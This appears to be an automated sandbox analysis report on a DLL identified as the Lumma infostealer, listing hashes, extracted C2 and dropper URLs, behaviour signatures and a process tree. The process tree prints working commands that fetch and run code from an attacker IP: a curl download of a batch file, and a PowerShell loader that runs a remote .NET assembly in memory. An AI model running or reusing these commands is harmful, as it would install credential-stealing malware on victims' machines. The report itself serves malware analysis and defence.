Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/01/2025, 18:41

General

  • Target

    b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll

  • Size

    80KB

  • MD5

    07fd51e1e8368144ea403137a671b84c

  • SHA1

    b41a78c43c5bf58f6664cb455130c9501c370f05

  • SHA256

    b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f

  • SHA512

    854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7

  • SSDEEP

    1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://147.45.44.131/infopage/ioubcs.exe

exe.dropper

http://147.45.44.131/infopage/ioubcs.exe

Extracted

Family

lumma

C2

https://factlosserk.click/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Windows\SysWOW64\curl.exe
          curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
          4⤵
            PID:5032
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K AppS.bat
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2936
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4104
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4696
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp" "c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2392
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4976

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp

      Filesize

      1KB

      MD5

      016b6fcfecdb1b5ed2c1ccf2c391a814

      SHA1

      f4f99950557e15f0de8dfa8d2f98df994788d41c

      SHA256

      5b1d9a912ec8fabaf79700681567a3505f3e5cb641ba0f5b41179ef43e44a516

      SHA512

      c01cd78d0f1d9567b82d5f50445d6b67dd16540e6d2a7de9c180ad3fcaabdf86e109c78cb12adc36b7f3395bdaa96cc3273b7b56ad66bff0ea12398cb0db762d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n45yynra.xie.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.dll

      Filesize

      9KB

      MD5

      af563fda59513de1cf9bd54c842930f5

      SHA1

      bb0ccf2bfa7f3a6388e6e6105528a34a8d1b1fef

      SHA256

      34b6ad6b7dff40171dea8e08bfebcbfeeb809a063c0b51f296c39942dfea05f9

      SHA512

      b2435a49e49ebfd9be6212163345668181776e123850000612f27cca84c22dc35a6bd29c1402631145e3e0f7214cbf86215da9a66a0e0e2cef9654ae4a52eb6b

    • C:\Windows\Temp\AppS.bat

      Filesize

      5KB

      MD5

      244582a493f376d9c0f5672292d11ff2

      SHA1

      95e5011b114869175aebca27f73b11a9b0a2360b

      SHA256

      ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87

      SHA512

      59e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41

    • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP

      Filesize

      652B

      MD5

      e68fd1932e84a119b2875f57b5403f16

      SHA1

      a360ec1208a49b7d722b3b9d98a2dbf8ca9bea3b

      SHA256

      1baf0c41e97d6e57b3feac57efac872099c6fd1c2098eeaa0457ddc7df18d1da

      SHA512

      fe7f730c3dfda414a2525489c8c01bc5e4da2cf4310904dfd4090f1105ed4bf6d0cd170b721a4d56b951bbadd63de9b0f721e539897421f514a9acfa85868f2e

    • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.0.cs

      Filesize

      10KB

      MD5

      9a280bef5048674eed1b619db8e0c654

      SHA1

      f849de0496358992d1c0d40562da1aaede680453

      SHA256

      84a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30

      SHA512

      6a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f

    • \??\c:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline

      Filesize

      204B

      MD5

      5d29a30a35c631cf07f7c4b210c6792b

      SHA1

      ebe0a3146c53df90a74f45bb865909083f38ad54

      SHA256

      40d19c7663f72a5c5908aff2d8e5e4abc641eb8041c7717ddd9d30be5126f89c

      SHA512

      db82782b7d2a160a38e4e8bea2f30e211b42ca525841ff395f215221ad3955c6120e09e1a2fca7522db6f587ae1e2110ba710cf610a2de5234da32f777bcf799

    • memory/4104-7-0x00000000058D0000-0x00000000058F2000-memory.dmp

      Filesize

      136KB

    • memory/4104-6-0x0000000074F50000-0x0000000075700000-memory.dmp

      Filesize

      7.7MB

    • memory/4104-8-0x0000000006050000-0x00000000060B6000-memory.dmp

      Filesize

      408KB

    • memory/4104-19-0x0000000006140000-0x0000000006494000-memory.dmp

      Filesize

      3.3MB

    • memory/4104-20-0x0000000006790000-0x00000000067AE000-memory.dmp

      Filesize

      120KB

    • memory/4104-21-0x00000000067D0000-0x000000000681C000-memory.dmp

      Filesize

      304KB

    • memory/4104-22-0x0000000007EC0000-0x000000000853A000-memory.dmp

      Filesize

      6.5MB

    • memory/4104-23-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

      Filesize

      104KB

    • memory/4104-24-0x0000000006D70000-0x0000000006D7E000-memory.dmp

      Filesize

      56KB

    • memory/4104-9-0x00000000060C0000-0x0000000006126000-memory.dmp

      Filesize

      408KB

    • memory/4104-5-0x0000000005930000-0x0000000005F58000-memory.dmp

      Filesize

      6.2MB

    • memory/4104-4-0x0000000074F50000-0x0000000075700000-memory.dmp

      Filesize

      7.7MB

    • memory/4104-3-0x0000000003170000-0x00000000031A6000-memory.dmp

      Filesize

      216KB

    • memory/4104-2-0x0000000074F5E000-0x0000000074F5F000-memory.dmp

      Filesize

      4KB

    • memory/4104-37-0x0000000005450000-0x0000000005458000-memory.dmp

      Filesize

      32KB

    • memory/4104-43-0x0000000074F50000-0x0000000075700000-memory.dmp

      Filesize

      7.7MB

    • memory/4976-40-0x0000000000400000-0x000000000045A000-memory.dmp

      Filesize

      360KB

    • memory/4976-39-0x0000000000400000-0x000000000045A000-memory.dmp

      Filesize

      360KB